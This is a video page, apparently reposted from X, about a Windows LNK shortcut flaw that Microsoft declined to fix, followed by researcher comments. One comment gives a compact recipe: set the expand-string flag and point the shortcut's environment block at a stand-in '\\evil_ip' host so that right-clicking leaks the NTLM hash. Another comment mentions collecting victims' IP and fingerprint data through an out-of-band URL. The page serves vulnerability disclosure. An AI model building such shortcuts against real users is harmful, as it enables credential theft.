Загрузка видео...

Не удалось загрузить видео

На главную

A quick writeup on potential security issue of Windows LNK that I reported to MSRC last month. They decided to not fix due to relying on MOTW. In the blog I included the proof of concept. All you have to do is to Right-Click and get Info Disclosure :)

25,240 просмотров • 1 год назад •via X (Twitter)

Комментарии: 11

Фото профиля sixtyvividtails
sixtyvividtails1 год назад

Nice seeing actual dig into details of .LNK structure! tag/TLDR: lnk.header.flags |= HAS_EXP_STRING; 🤭 lnk.envarBlock := "\\evil_ip\gibe_hash" then right-click to sendout the ntlm hash

Фото профиля nafiez
nafiez1 год назад

Thanks 🫡

Фото профиля WAGMI | Crypto, DeFi & Web3 News
WAGMI | Crypto, DeFi & Web3 News2 лет назад

"My friends think I'm a crypto genius, (I'm not) it's because I read WAGMI’s weekly newsletter (and they have no idea it exists)" - Every Crypto Degen

Фото профиля I am Jakoby
I am Jakoby1 год назад

I did something similar but I passed an http oob url and used it to collect their ip address, geolocation, and finger print info This is significantly more severe and I am honestly shocked they decided not to fix it

Фото профиля nafiez
nafiez1 год назад

That sounds awesome! Have you write or publish anything about the stuff you work on? Yeah too bad they didn’t treat this as security issue since MOTW did the protection, according to them :-)

Фото профиля ClearSky Cyber Security
ClearSky Cyber Security1 год назад

Open since June 24

Фото профиля nafiez
nafiez1 год назад

The description looks similar however in your advisory seems to tie with CVE-2024-43451. How come this still not fix for the Right-Click? Any thoughts?

Фото профиля jcatblackhat
jcatblackhat1 год назад

TAG: PoC

Фото профиля Jean
Jean1 год назад

What's the app you use for function tracing?

Фото профиля nafiez
nafiez1 год назад

I’m using Rohitab API Monitor

Фото профиля Bruno
Bruno1 год назад

@BriPwn

Похожие видео